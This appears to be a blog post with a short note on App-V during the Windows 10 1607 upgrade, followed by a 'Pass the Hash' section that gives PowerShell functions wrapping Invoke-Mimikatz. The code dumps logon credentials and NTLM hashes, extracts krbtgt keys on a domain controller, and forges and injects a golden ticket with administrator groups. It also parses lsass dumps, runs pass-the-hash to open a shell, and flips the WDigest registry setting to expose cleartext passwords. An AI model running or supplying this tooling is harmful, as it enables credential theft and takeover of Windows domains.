Windows 10–1607 and App-V

With the new Windows 10 version in place, App-V is integrated into the operating system (as a Windows feature of the Enterprise and Education editions). You may wonder what happens to a machine that gets an in-place upgrade while an App-V client is installed.

The cache stays, the separately installed App-V client is uninstalled and the App-V feature of the operating system is enabled. So the migration from Windows 10 1511 with a current App-V client to Windows 10 1607 should be flawless.


Pass the Hash

One of the main security issues with Windows is pass the hash. I added some functions to the Mimikatz PowerShell script, which can be found here.


The functions below make mimikatz easier to use. Append them to the end of the Invoke-Mimikatz script and run the script; the functions are then loaded into the session (they are declared Global:) and the list of available functions is printed. All logs and dumps are read from and written to $ScriptPath, the directory the script is started from.

# $ScriptPath is not defined by Invoke-Mimikatz.ps1 itself: use the script
# directory, or the current directory when the script was loaded from memory
if (-not $ScriptPath) {
    $Global:ScriptPath = if ($PSScriptRoot) { $PSScriptRoot } else { (Get-Location).Path }
}

Function Global:invoke-mimiDom {
    if (Test-Path "$ScriptPath\mimi_dom.log") {
        $MimiUser = "didi44"   # user name put into the forged ticket, does not have to exist
        Write-Host $ScriptPath -ForegroundColor green
        $global:mimidata = Get-Content "$ScriptPath\mimi_dom.log"
        $global:aes = $null
        foreach ($line in $mimidata) {
            # take only the first aes256 key: the OldCredentials block further down in
            # the lsadump output also contains an aes256_hmac line (previous krbtgt key)
            if ($line -match "aes256_hmac" -and -not $aes) { $global:aes = $($line.split(":")[1]).trim() }
            if ($line -match "Domain :") { $global:domSid = $($line.split("/")[1]).trim() }
            if ($line -match "Default Salt :") { $global:domain = $($($line.split(":")[1]).trim()).replace("krbtgt", "") }
        }
        $FullCMD = "kerberos::golden /domain:" + $domain + " /sid:" + $domSid + " /aes256:" + $aes + " /user:" + $MimiUser + " /id:500 /groups:500,501,513,512,520,518,519 /ticket:forged.kirbi"
        Write-Host $FullCMD
        # purge the current tickets, forge the golden ticket, inject it and open a cmd that uses it
        Invoke-Mimikatz -Command "privilege::debug kerberos::purge `"$FullCMD`" `"kerberos::ptt forged.kirbi`" misc::cmd"
    } ELSE {
        Write-Host "there is no mimi_dom.log, please run invoke-mimiExportDom on a domain controller first" -ForegroundColor red
    }
}

Function Global:invoke-mimiStd {
    # without -Command, Invoke-Mimikatz runs sekurlsa::logonpasswords
    $global:mimi_tmp = Invoke-Mimikatz
    $mimi_tmp | Out-File "$ScriptPath\mimi.log"
    $global:mimi = Get-Content "$ScriptPath\mimi.log"
    $number = 0
    foreach ($line in $mimi) {
        $number++
        # the first "Username : Administrator" block is the msv one; it is
        # followed by the Domain line and then the NTLM line
        if ($line -match "\* Username : Administrator") {
            $Global:mimiUsername1 = $($line.split(":")[1]).trim()
            $Global:mimiDom1 = $($mimi[$number].split(":")[1]).trim()
            $Global:mimiHash1 = $($mimi[$number + 1].split(":")[1]).trim()
            break
        }
    }
    Write-Host "$mimiUsername1 $mimiDom1 $mimiHash1"
}

FUNCTION Global:invoke-MimiExportDom {
    # has to run on a domain controller: dumps the krbtgt keys from the LSA
    if (!(Test-Path "$ScriptPath\mimi_dom.log")) {
        $global:mimi_dom_tmp = Invoke-Mimikatz -Command "privilege::debug `"lsadump::lsa /inject /name:krbtgt`""
        $global:mimi_dom_tmp | Out-File "$ScriptPath\mimi_dom.log"
        $global:mimi_dom = Get-Content "$ScriptPath\mimi_dom.log"
    }
}

FUNCTION Global:Invoke-mimiDMP {
    # parse every minidump (e.g. of lsass.exe) in $ScriptPath; the results are
    # collected so that the output of all dumps is shown, not only the last one
    $global:mimi = @()
    $dmps = Get-ChildItem "$ScriptPath\*.dmp"
    foreach ($dmp in $dmps) {
        Write-Host "analysing $($dmp.FullName)" -ForegroundColor green
        $global:mimi += Invoke-Mimikatz -Command "privilege::debug `"sekurlsa::minidump $($dmp.FullName)`" sekurlsa::logonpasswords"
    }
    Write-Host $mimi
}

FUNCTION Global:Invoke-mimicmd {
    if (-not $mimiUsername1) {
        Write-Host "please run invoke-mimiStd first" -ForegroundColor red
    } ELSE {
        # pass the hash: start a cmd whose network logons use the NTLM hash of the user
        $command = "privilege::debug `"sekurlsa::pth /user:" + $mimiUsername1 + " /domain:" + $mimiDom1 + " /ntlm:" + $mimiHash1 + " /run:cmd`""
        Write-Host "$command"
        $global:mimi = Invoke-Mimikatz -Command $command
    }
}

#sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND

# make WDigest keep cleartext passwords in memory again; the change only
# applies to logons made after the value is set
$wdigest = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -ErrorAction SilentlyContinue
if ($wdigest.UseLogonCredential -ne 1) {
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
    Write-Host "changed security provider - to see passwords in cleartext log off and log on again" -ForegroundColor Yellow
}

Write-Host "the following functions are available:"
Write-Host "invoke-mimiStd" -ForegroundColor green
Write-Host "invoke-mimiExportDom" -ForegroundColor green
Write-Host "invoke-mimiDom" -ForegroundColor green
Write-Host "invoke-mimiDmp" -ForegroundColor green
Write-Host "invoke-mimiCMD" -ForegroundColor green
